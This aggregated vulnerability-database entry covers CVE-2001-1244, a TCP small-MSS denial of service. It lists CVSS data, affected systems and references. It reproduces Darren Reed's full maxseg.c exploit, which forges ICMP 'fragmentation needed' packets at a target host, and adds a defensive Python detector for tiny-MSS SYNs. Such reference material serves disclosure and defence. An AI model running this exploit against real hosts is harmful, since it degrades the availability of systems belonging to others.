CVE-2001-1244
CVSS 5.0
Published: 2001-07-07 00:00:00
Revised: 2008-09-05 16:26:03

[Original] Multiple TCP implementations could allow remote attackers to cause a denial of service (bandwidth and CPU exhaustion) by setting the maximum segment size (MSS) to a very small number and requesting large amounts of data, which generates more packets with less TCP-level data that amplify network traffic and consume more server CPU to process.


[CNNVD] Multiple operating systems small TCP MSS denial of service vulnerability (CNNVD-200107-059)

        CVE(CAN) ID: CAN-2001-1244

        Potential denial of service problems exist in the TCP stack implementations of several operating systems.

        The TCP options include an MSS (maximum segment size). A TCP client uses it to tell its peer the maximum amount of TCP data it will accept per segment.

        If the MSS is set to a very small value (for example 1) and a large number of requests are then submitted through a TCP service, the peer server may be made to generate a large number of reply segments (many times the number the attacker sent). This can greatly increase the load on the server or the network and cause a denial of service.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp5  Microsoft Windows 4.0 sp5
cpe:/o:sun:solaris:8.0
cpe:/o:linux:linux_kernel:2.4.1  Linux Kernel 2.4.1
cpe:/o:microsoft:windows_nt:4.0:sp3  Microsoft Windows 4.0 sp3
cpe:/o:microsoft:windows_2000:::workstation
cpe:/o:hp:hp-ux:11.00  HP-UX 11.00
cpe:/o:hp:vvos:11.04  HP VVOS 11.04
cpe:/o:netbsd:netbsd:1.5  NetBSD 1.5
cpe:/o:microsoft:windows_nt:4.0:sp6a  Microsoft Windows 4.0 sp6a
cpe:/o:sun:solaris:2.5.1
cpe:/o:linux:linux_kernel:2.4.4  Linux Kernel 2.4.4
cpe:/o:openbsd:openbsd:2.9  OpenBSD 2.9
cpe:/o:microsoft:windows_nt:4.0:sp1  Microsoft Windows 4.0 sp1
cpe:/o:netbsd:netbsd:1.5.1  NetBSD 1.5.1
cpe:/o:microsoft:windows_nt:4.0  Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt:4.0:sp2  Microsoft Windows 4.0 sp2
cpe:/o:hp:hp-ux:11.0.4  HP HP-UX 11.0.4
cpe:/o:linux:linux_kernel:2.4.5  Linux Kernel 2.4.5
cpe:/o:microsoft:windows_2000::sp1  Microsoft Windows 2000 SP1
cpe:/o:microsoft:windows_nt:4.0:sp4  Microsoft Windows 4.0 sp4
cpe:/o:hp:hp-ux:11.11  HP-UX 11.11
cpe:/o:microsoft:windows_2000::sp2  Microsoft Windows 2000 SP2
cpe:/o:freebsd:freebsd:4.3  FreeBSD 4.3
cpe:/o:openbsd:openbsd:2.8  OpenBSD 2.8
cpe:/o:microsoft:windows_nt:4.0:sp6  Microsoft Windows 4.0 sp6
cpe:/o:sun:solaris:7.0
cpe:/o:linux:linux_kernel:2.4.0  Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.2  Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.3  Linux Kernel 2.4.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1244
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1244
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-059
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6824.php
(VENDOR_ADVISORY)  XF  tcp-mss-dos(6824)
http://www.securityfocus.com/bid/2997
(VENDOR_ADVISORY)  BID  2997
http://www.securityfocus.com/archive/1/195457
(UNKNOWN)  BUGTRAQ  20010708 Small TCP packets == very large overhead == DoS?

- Vulnerability information

Multiple operating systems small TCP MSS denial of service vulnerability
Medium  Design error
2001-07-07 00:00:00  2005-10-20 00:00:00
Remote

- Advisories and patches

        None available

- Vulnerability information (20997)

HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS (EDBID:20997)
multiple dos
2001-07-07 Verified
0 Darren Reed
N/A
source: http://www.securityfocus.com/bid/2997/info

A potential denial of service vulnerability exists in several TCP stack implementations.

TCP has an MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS.

By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system.

/*
 * (C)Copyright 2001 Darren Reed.
 *
 * maxseg.c
 *
 * Written against the BSD socket and header layout (struct icmp with
 * icmp_nextmtu, struct tcphdr with th_sport); needs a raw socket, i.e. root.
 * Includes and a few obvious defects (undeclared variable, wrong
 * setsockopt level, wrong sizeof, socklen_t) fixed for this page.
 */
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#if BSD >= 199306
#include <sys/sysctl.h>
#endif

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_var.h>
#include <netinet/tcp.h>
#include <netinet/tcp_timer.h>
#include <netinet/tcp_var.h>
#include <arpa/inet.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

void prepare_icmp(struct sockaddr_in *);
void primedefaultmss(int, int);
u_short in_cksum(u_short *, int);
int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);


#define	NEW_MSS	512
#define	NEW_MTU	1500
static int start_mtu = NEW_MTU;

/*
 * Lower the local default MSS (NetBSD sysctl net.inet.tcp.mssdflt) or, on a
 * specially patched kernel, set it per socket.  mss == 0 restores the value
 * saved on the first call.
 */
void
primedefaultmss(int fd, int mss)
{
#ifdef __NetBSD__
	static int defaultmss = 0;
	int mib[4], msso, mssn;
	size_t olen;

	if (mss == 0)
		mss = defaultmss;
	mssn = mss;
	olen = sizeof(msso);

	mib[0] = CTL_NET;
	mib[1] = AF_INET;
	mib[2] = IPPROTO_TCP;
	mib[3] = TCPCTL_MSSDFLT;
	if (sysctl(mib, 4, &msso, &olen, NULL, 0))
		err(1, "sysctl");
	if (defaultmss == 0)
		defaultmss = msso;

	if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
		err(1, "sysctl");

	if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
		err(1, "sysctl");

	printf("Default MSS: old %d new %d\n", msso, mssn);
#endif

#if HACKED_KERNEL
	int op;

	if (mss)
		op = mss;
	else
		op = 512;
	if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
		err(1, "setsockopt");
#else
	(void)fd;
#endif
}


int
main(int argc, char *argv[])
{
	struct sockaddr_in me, them;
	int fd, op, mss;
	socklen_t olen;
	ssize_t n;
	char prebuf[16374];
	time_t now1, now2;
	struct timeval tv;

	if (argc != 3) {
		fprintf(stderr, "usage: %s host port\n", argv[0]);
		exit(1);
	}

	mss = NEW_MSS;

	primedefaultmss(-1, mss);

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if (fd == -1)
		err(1, "socket");

	memset((char *)&them, 0, sizeof(them));
	them.sin_family = AF_INET;
	them.sin_port = htons(atoi(argv[2]));
	them.sin_addr.s_addr = inet_addr(argv[1]);

	primedefaultmss(fd, mss);

	/* non-blocking so the read loop below can poll instead of hang */
	op = fcntl(fd, F_GETFL, 0);
	if (op != -1) {
		op |= O_NONBLOCK;
		fcntl(fd, F_SETFL, op);
	}

	op = 1;
	(void) setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &op, sizeof(op));

	if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
	    (errno != EINPROGRESS))
		err(1, "connect");

	olen = sizeof(op);
	if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
		printf("Remote mss %d\n", op);
	else
		err(1, "getsockopt");

#if HACKED_KERNEL
	olen = sizeof(op);
	if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
		printf("Our mss %d\n", op);
	else
		err(1, "getsockopt(+1)");
#endif

	/* our own address/port, needed for the embedded header in the ICMP */
	olen = sizeof(me);
	if (getsockname(fd, (struct sockaddr *)&me, &olen))
		err(1, "getsockname");

	(void) read(fd, prebuf, sizeof(prebuf));

	now1 = time(NULL);
	/* two forged "fragmentation needed" messages, draining replies between */
	for (op = 2; op; op--) {
		icmp_unreach(&me, &them);
		n = read(fd, prebuf, sizeof(prebuf));
		if (n == -1) {
			if (errno == ENOBUFS || errno == EAGAIN ||
			    errno == EWOULDBLOCK) {
				/* nothing to read yet: sleep 10 ms */
				tv.tv_sec = 0;
				tv.tv_usec = 10000;
				select(3, NULL, NULL, NULL, &tv);
				continue;
			}
			warn("read");
			break;
		}
	}
	now2 = time(NULL);
	printf("Elapsed time %ld\n", (long)(now2 - now1));

	primedefaultmss(fd, 0);
	close(fd);
	return 0;
}


/*
 * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
 */
static char icmpbuf[256];
static int icmpsock = -1;
static struct sockaddr_in destsock;

/*
 * Build (once) an ICMP "unreachable / fragmentation needed" message whose
 * embedded IP+TCP header looks like a segment the peer sent on this
 * connection; the next-hop MTU field is refreshed on every call.
 */
void
prepare_icmp(struct sockaddr_in *dst)
{
	struct tcphdr *tcp;
	struct icmp *icmp;

	icmp = (struct icmp *)icmpbuf;

	if (icmpsock == -1) {

		memset((char *)&destsock, 0, sizeof(destsock));
		destsock.sin_family = AF_INET;
		destsock.sin_addr = dst->sin_addr;

		srand(getpid());

		icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
		if (icmpsock == -1)
			err(1, "socket");

		/* the following messy stuff from Adam Glass (icmpsquish.c) */
		memset(icmp, 0, sizeof(struct icmp) + 8);
		icmp->icmp_type = ICMP_UNREACH;
		icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
		icmp->icmp_pmvoid = 0;

		icmp->icmp_ip.ip_v = IPVERSION;
		icmp->icmp_ip.ip_hl = 5;
		icmp->icmp_ip.ip_len = htons(NEW_MSS);
		icmp->icmp_ip.ip_p = IPPROTO_TCP;
		icmp->icmp_ip.ip_off = htons(IP_DF);
		icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
		icmp->icmp_ip.ip_id = rand() & 0xffff;

		icmp->icmp_ip.ip_src = dst->sin_addr;

		tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
		tcp->th_sport = dst->sin_port;
	}
	icmp->icmp_nextmtu = htons(start_mtu);
	icmp->icmp_cksum = 0;
}


u_short
in_cksum(u_short *addr, int len)
{
	    register int nleft = len;
	    register u_short *w = addr;
	    register int sum = 0;
	    u_short answer = 0;

	    /*
	     *  Our algorithm is simple, using a 32 bit accumulator (sum),
	     *  we add sequential 16 bit words to it, and at the end, fold
	     *  back all the carry bits from the top 16 bits into the lower
	     *  16 bits.
	     */
	    while( nleft > 1 )  {
	            sum += *w++;
	            nleft -= 2;
	    }

	    /* mop up an odd byte, if necessary */
	    if( nleft == 1 ) {
	            *(u_char *)(&answer) = *(u_char *)w ;
	            sum += answer;
	    }

	    /*
	     * add back carry outs from top 16 bits to low 16 bits
	     */
	    sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
	    sum += (sum >> 16);                     /* add carry */
	    answer = ~sum;                          /* truncate to 16 bits */
	    return (answer);
}

/*
 * Finish the forged ICMP for our local endpoint (src) and send it to the
 * peer (dst); each call halves the advertised next-hop MTU down to 69.
 */
int
icmp_unreach(struct sockaddr_in *src, struct sockaddr_in *dst)
{
	struct tcphdr *tcp;
	struct icmp *icmp;
	int i;
	u_short sum;

	icmp = (struct icmp *)icmpbuf;

	prepare_icmp(dst);

	icmp->icmp_ip.ip_dst = src->sin_addr;

	sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
	icmp->icmp_ip.ip_sum = sum;

	tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
	tcp->th_dport = src->sin_port;

	sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
	icmp->icmp_cksum = sum;
	start_mtu /= 2;
	if (start_mtu < 69)
		start_mtu = 69;

	i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
		   (struct sockaddr *)&destsock, sizeof(destsock));
	if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
	    errno != EWOULDBLOCK)
		err(1, "sendto");
	return(0);
}

- Vulnerability information

10385
Multiple TCP Implementation Mismatched MSS Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

- Timeline

2001-07-07 Unknown
2001-07-07 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor Small TCP MSS Denial of Service Vulnerability
Design Error 2997
Yes No
2001-07-07 12:00:00 2009-07-11 06:56:00
Reported by Darren Reed <avalon@coombs.anu.edu.au> on July 7, 2001.

- Affected versions

Sun Solaris 2.5.1
Sun Solaris 8_sparc
Sun Solaris 7.0
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.16 m
SGI IRIX 6.5.16 f
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
Linux kernel 2.4.1
Linux kernel 2.4
HP HP-UX (VVOS) 11.0.4
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
FreeBSD FreeBSD 4.3
SGI IRIX 6.5.19

- Unaffected versions

SGI IRIX 6.5.19

- Discussion

A potential denial of service vulnerability exists in several TCP stack implementations.

TCP has an MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS.

By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system.
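The discussion above (and its copy under the Exploit-DB entry earlier on this page) describes the mechanism only in prose. The following Python script is an added illustration for this page, not code from the advisory, from Darren Reed's maxseg.c, or from any vendor. It parses the option field of a TCP SYN to read the advertised MSS, flags a SYN whose MSS is below a policy floor, and computes how many segments and how many header bytes a response of a given size costs at that MSS, which is the amplification the advisory describes. The floor MIN_ACCEPTABLE_MSS, the 40-byte header estimate and the sample SYNs built by build_syn are constructed for the example.

```python
"""Detect tiny-MSS TCP SYNs and estimate the segment amplification they cause.

Added illustration for CVE-2001-1244; not code from the advisory or exploit.
The policy floor and the sample segments below are constructed values.
"""
import struct

TCPOPT_EOL = 0
TCPOPT_NOP = 1
TCPOPT_MAXSEG = 2          # kind 2, length 4, 16-bit MSS value (RFC 793)

MIN_ACCEPTABLE_MSS = 536   # assumed policy floor for this example (RFC 1122 default MSS)
IP_TCP_HEADER_BYTES = 40   # 20-byte IPv4 header + 20-byte TCP header, no options


def parse_tcp_options(tcp_segment: bytes) -> dict:
    """Return {kind: raw_value_bytes} for the options carried by a TCP segment.

    The data offset (high nibble of byte 12) gives the header length in
    32-bit words; options occupy bytes 20 .. offset*4.
    """
    if len(tcp_segment) < 20:
        raise ValueError("truncated TCP header")
    data_offset = (tcp_segment[12] >> 4) * 4
    if data_offset < 20 or data_offset > len(tcp_segment):
        raise ValueError("bad data offset")
    opts = tcp_segment[20:data_offset]
    parsed = {}
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == TCPOPT_EOL:
            break
        if kind == TCPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option kind %d missing length" % kind)
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("option kind %d has bad length %d" % (kind, length))
        parsed[kind] = opts[i + 2:i + length]
        i += length
    return parsed


def advertised_mss(tcp_segment: bytes):
    """MSS announced in the segment's options, or None if the option is absent."""
    raw = parse_tcp_options(tcp_segment).get(TCPOPT_MAXSEG)
    if raw is None or len(raw) != 2:
        return None
    return struct.unpack("!H", raw)[0]


def is_syn(tcp_segment: bytes) -> bool:
    flags = tcp_segment[13]
    return bool(flags & 0x02) and not (flags & 0x10)  # SYN set, ACK clear


def flag_tiny_mss(tcp_segment: bytes, minimum: int = MIN_ACCEPTABLE_MSS):
    """Return (mss, alert); alert is True for a SYN advertising mss < minimum."""
    if not is_syn(tcp_segment):
        return None, False
    mss = advertised_mss(tcp_segment)
    return mss, (mss is not None and mss < minimum)


def amplification(response_bytes: int, mss: int):
    """Segments and on-wire bytes needed to deliver response_bytes at a given MSS."""
    segments = -(-response_bytes // mss)  # ceiling division
    wire_bytes = response_bytes + segments * IP_TCP_HEADER_BYTES
    return segments, wire_bytes


def build_syn(mss=None) -> bytes:
    """Construct a minimal TCP SYN (sample input for the example, not a capture)."""
    options = b""
    if mss is not None:
        options = struct.pack("!BBH", TCPOPT_MAXSEG, 4, mss)  # already 32-bit aligned
    data_offset = ((20 + len(options)) // 4) << 4
    # sport, dport, seq, ack, offset, flags=SYN, window, checksum, urgent
    header = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, data_offset, 0x02, 65535, 0, 0)
    return header + options


if __name__ == "__main__":
    for label, syn in (("mss=1", build_syn(1)), ("mss=1460", build_syn(1460)), ("no mss", build_syn())):
        mss, alert = flag_tiny_mss(syn)
        print("%-9s advertised=%s alert=%s" % (label, mss, alert))
    for mss in (1, 536, 1460):
        print("1 MB response at MSS %4d: %d segments, %d bytes on the wire"
              % (mss, *amplification(1_000_000, mss)))
```

Run stand-alone, the script shows that a 1 MB response at MSS 1 needs one million segments and about 41 MB on the wire, against 685 segments at MSS 1460; every one of those segments also costs the server a trip through its TCP output path, which is the CPU side of the advisory. The floor the script checks is the mitigation that stacks later adopted: current Linux kernels, for instance, clamp the sender-side MSS to the net.ipv4.tcp_min_snd_mss sysctl (default 48) rather than honouring an arbitrarily small peer advertisement.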

- Exploit

An example exploit has been provided by Darren Reed <avalon@coombs.anu.edu.au>:

- Solution

SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 or to apply the following fixes.

The following fixes are available:

SGI IRIX 6.5.14 f
SGI IRIX 6.5.14 m
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.16 f
SGI IRIX 6.5.16 m
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f

- References
